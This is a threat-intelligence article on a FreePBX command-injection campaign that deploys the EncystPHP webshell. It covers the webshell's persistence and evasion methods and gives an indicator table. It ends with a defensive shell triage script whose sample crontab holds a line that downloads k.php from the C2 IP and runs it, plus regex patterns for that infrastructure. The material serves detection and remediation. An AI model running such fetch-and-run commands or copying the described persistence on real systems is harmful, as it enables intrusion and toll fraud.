Fortinet researchers have uncovered a sophisticated attack campaign that leverages a critical FreePBX vulnerability to deploy a persistent webshell dubbed "EncystPHP," giving the threat actors complete administrative control over compromised VoIP systems.
The campaign, launched in early December 2025, exploits CVE-2025-64328, a post-authentication command-injection flaw in the FreePBX Endpoint Manager’s administrative interface.
The malicious activity is attributed to INJ3CTOR3, a financially motivated hacker group first identified in 2020 when they targeted CVE-2019-19006 in FreePBX systems.
In 2022, the threat actor evolved their tactics by shifting focus to Elastix systems through the exploitation of CVE-2021-45461. The group has consistently demonstrated a pattern of targeting VoIP infrastructure for monetization purposes, primarily through unauthorized call generation and toll fraud.
Vulnerability Exploitation and Initial Access
CVE-2025-64328 is classified as a critical command injection vulnerability in the Endpoint Manager module, specifically within the check_ssh_connect() function of the Filestore component.
The vulnerability allows authenticated attackers to execute arbitrary shell commands as the asterisk user, providing a foothold for deeper system compromise. Because the flaw requires authentication, exploitation presupposes valid credentials for the FreePBX administrative GUI, so an internet-exposed admin interface is the practical precondition for this campaign. Attack traffic originated from Brazil and targeted victim environments managed by an Indian technology company specializing in cloud solutions and communication services.
Fortinet observed that the attackers downloaded the EncystPHP dropper from the IP address 45[.]234[.]176[.]202, to which the domain crm[.]razatelefonia[.]pro resolves; the site masquerades as a VoIP management system with login functionality. Requests to the new/ path on that host are redirected to a second dropper named k.php.
The EncystPHP webshell combines remote command execution with multi-stage persistence and several evasion techniques.
Upon deployment, the malware modifies the file permissions of legitimate FreePBX components to hinder detection and removes competing webshells from the compromised system.
The webshell establishes persistence by creating a root-level user account named “newfpbx” with hardcoded credentials, resets multiple user account passwords to a single value, and injects SSH public keys to maintain backdoor access. The malware also modifies system configurations to ensure SSH port 22 remains open, providing continuous remote access for the attackers.
EncystPHP masquerades as a legitimate FreePBX file named ajax.php, allowing it to blend into the application structure and evade casual inspection. Operator authentication is MD5-based: the webshell hashes the password submitted through its web form and compares the digest with hash values hard-coded in the script. Those embedded digests also serve as a reliable static signature for the file.
Once authenticated, the webshell exposes an interactive interface titled “Ask Master” that includes predefined operational commands for file system enumeration, process inspection, querying active Asterisk channels, listing SIP peers, and retrieving FreePBX and Elastix configuration files.
By leveraging elevated privileges within the Elastix and FreePBX administrative contexts, the webshell enables arbitrary command execution and initiates outbound call activity through the compromised PBX environment.
Multi-Stage Persistence Architecture
The attack implements a four-stage persistence mechanism to ensure long-term access. Initial persistence is established through crontab entries that download the secondary dropper k.php every minute.
Subsequent stages deploy additional droppers across multiple directories under /var/www/html/, including digium_phones/, rest_phones/, phones/, and freepbxphones/, creating redundant access points that increase resilience against removal attempts.
The malware forges timestamps to match legitimate files and deploys webshell instances to at least twelve different file paths, ensuring alternative access routes remain available if primary instances are detected and removed. Because only the modification time can be set from userland, a file whose mtime is far older than its inode change time (ctime) is a tell for this kind of timestomping. EncystPHP also tampers with log files and disables error reporting to hinder forensic analysis and detection efforts.
Organizations operating unpatched FreePBX systems should treat any successful exploitation as a full compromise requiring immediate remediation, comprehensive monitoring, and security hardening. Given the persistence described above, remediation means more than patching Endpoint Manager: remove the newfpbx account and any other UID-0 user, rotate every admin and SIP credential (the malware resets several to one value), purge injected SSH keys and cron entries, and sweep every directory under /var/www/html/ for rogue ajax.php copies.
The incident underscores that VoIP and PBX systems remain high-value targets for threat actors seeking to monetize unauthorized access through toll fraud and abuse of telephony resources.
Indicators of Compromise (IoCs)
| Type | Indicator | Description |
|---|---|---|
| URL | hxxp://45[.]234[.]176[.]202/new/c | EncystPHP dropper download location |
| URL | hxxp://45[.]234[.]176[.]202/new/k.php | Secondary dropper download location |
| Domain | crm[.]razatelefonia[.]pro | Malicious domain resolving to C2 server |
| IPv4 | 45[.]234[.]176[.]202 | Command-and-control server IP address |
| IPv4 | 187[.]108[.]1[.]130 | Associated malicious infrastructure |
| SHA256 | 71d94479d58c32d5618ca1e2329d8fa62f930e0612eb108ba3298441c6ba0302 | EncystPHP webshell component |
| SHA256 | 7e3a47e3c6b82eb02f6f1e4be6b8de4762194868a8de8fc9103302af7915c574 | Dropper component file hash |
| SHA256 | fc514c45fa8e3a49f003eae4e0c8b6a523409b8341503b529c85ffe396bb74f2 | Persistence script file hash |
| SHA256 | 285fac34a5ffdac7cb047d412862e1ca5e091e70c0ac0383b71159fdd0d20bb2 | Configuration component hash |
| SHA256 | 29d74963f99563e711e5db39261df759f76da6893f3ca71a4704b9ee2b26b8c7 | Additional malware component |
| File Path | /var/www/html/admin/views/ajax.php | Primary webshell deployment location |
| File Path | /var/www/html/rest_phones/ajax.php | Alternative webshell deployment path |
| File Path | /var/www/html/admin/modules/core/ajax.php | Webshell persistence location |
| User Account | newfpbx | Malicious root-level user account |
| CVE | CVE-2025-64328 | Exploited FreePBX vulnerability |
| Detection | PHP/EncystPHP.A!tr | FortiGuard Antivirus signature |
| Detection | BASH/EncystPHP.A!tr | FortiGuard Antivirus signature |
| IPS Signature | 59448 | FreePBX.Administration.GUI.filestore.Command.Injection |
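As an added example (not code from Fortinet or the FreePBX project), the following POSIX shell helpers turn the persistence behaviour described above and the indicators in the table into a host triage sweep: UID-0 accounts other than root, cron entries that fetch from the listed infrastructure or run k.php, and ajax.php copies in the directories the article names, checked against the SHA256 list, for an md5()-of-request-parameter login (a generic webshell heuristic assumed here, not an observed EncystPHP trait) and for a back-dated mtime. The 60-second ctime gap, the cron locations searched, and the sample passwd and crontab content are constructed assumptions.

```shell
#!/bin/sh
# EncystPHP host triage helpers: an added example, not Fortinet's or FreePBX's code.
# Usage on a FreePBX host (as root), or against a mounted image:  sh encyst_triage.sh /

# Indicators copied from the IoC table above.
IOC_HASHES='71d94479d58c32d5618ca1e2329d8fa62f930e0612eb108ba3298441c6ba0302
7e3a47e3c6b82eb02f6f1e4be6b8de4762194868a8de8fc9103302af7915c574
fc514c45fa8e3a49f003eae4e0c8b6a523409b8341503b529c85ffe396bb74f2
285fac34a5ffdac7cb047d412862e1ca5e091e70c0ac0383b71159fdd0d20bb2
29d74963f99563e711e5db39261df759f76da6893f3ca71a4704b9ee2b26b8c7'
# Network indicators plus the k.php dropper name (extended regex).
IOC_NET='45\.234\.176\.202|187\.108\.1\.130|razatelefonia\.pro|(^|/)k\.php'
# Directories the article names as webshell/dropper locations, relative to /var/www/html.
IOC_DIRS='admin/views admin/modules/core rest_phones digium_phones phones freepbxphones'

# Constructed sample inputs (not from a real host) so the helpers can run offline.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
asterisk:x:995:993::/var/lib/asterisk:/sbin/nologin
newfpbx:x:0:0::/home/newfpbx:/bin/bash'
SAMPLE_CRON='* * * * * curl -s http://45.234.176.202/new/k.php -o /tmp/.k && php /tmp/.k
0 3 * * * /usr/sbin/fwconsole ma refreshsignatures'

# Print every UID-0 account other than root (the article reports "newfpbx").
find_root_accounts() {
    printf '%s\n' "$1" | awk -F: '$3 == 0 && $1 != "root" { print $1 }'
}

# Print cron lines that pull from the listed infrastructure or run k.php.
find_dropper_cron() {
    printf '%s\n' "$1" | grep -E "$IOC_NET"
}

# Succeed if HASH is one of the published SHA256 indicators.
hash_is_ioc() {
    printf '%s\n' "$IOC_HASHES" | grep -qx "$1"
}

# SHA256 of a file, with a fallback for hosts that ship shasum instead of sha256sum.
file_sha256() {
    { sha256sum "$1" 2>/dev/null || shasum -a 256 "$1"; } | cut -d' ' -f1
}

# Heuristic (an assumption here, not an observed EncystPHP trait): PHP that feeds a
# request parameter straight into md5() for a comparison is a common webshell login.
has_md5_login() {
    grep -Eq 'md5[[:space:]]*\([[:space:]]*\$_(POST|GET|REQUEST)' "$1"
}

# Succeed if mtime is more than 60s (assumed threshold) older than ctime. utime()/touch
# can back-date mtime to blend in with neighbours, but the kernel sets ctime on that very
# change and userland cannot set it, so a large gap exposes the forged timestamp.
mtime_backdated() {
    set -- "$(stat -c '%Y %Z' "$1" 2>/dev/null || stat -f '%m %c' "$1")"
    mtime=${1% *} ctime=${1#* }
    [ $((ctime - mtime)) -gt 60 ]
}

# Sweep a root (live "/" or a mounted image): accounts, cron locations, ajax.php copies.
triage() {
    root=${1:-/}
    find_root_accounts "$(cat "$root/etc/passwd")" | sed 's/^/[!] uid-0 account: /'
    for f in "$root"/etc/crontab "$root"/etc/cron.d/* "$root"/var/spool/cron/*; do
        [ -f "$f" ] && find_dropper_cron "$(cat "$f")" | sed "s|^|[!] $f: |"
    done
    for d in $IOC_DIRS; do
        f="$root/var/www/html/$d/ajax.php"
        [ -f "$f" ] || continue
        hash_is_ioc "$(file_sha256 "$f")" && echo "[!] $f: SHA256 matches IoC list"
        has_md5_login "$f" && echo "[!] $f: md5() login check on a request parameter"
        mtime_backdated "$f" && echo "[!] $f: mtime back-dated, ctime is newer"
    done
    return 0
}
```

Any `[!]` line is grounds to treat the host as compromised per the guidance above. A clean sweep is not exoneration: the article reports at least twelve deployment paths and names only some of them, so a full `find /var/www/html -name ajax.php` review and a look at every `authorized_keys` file should follow.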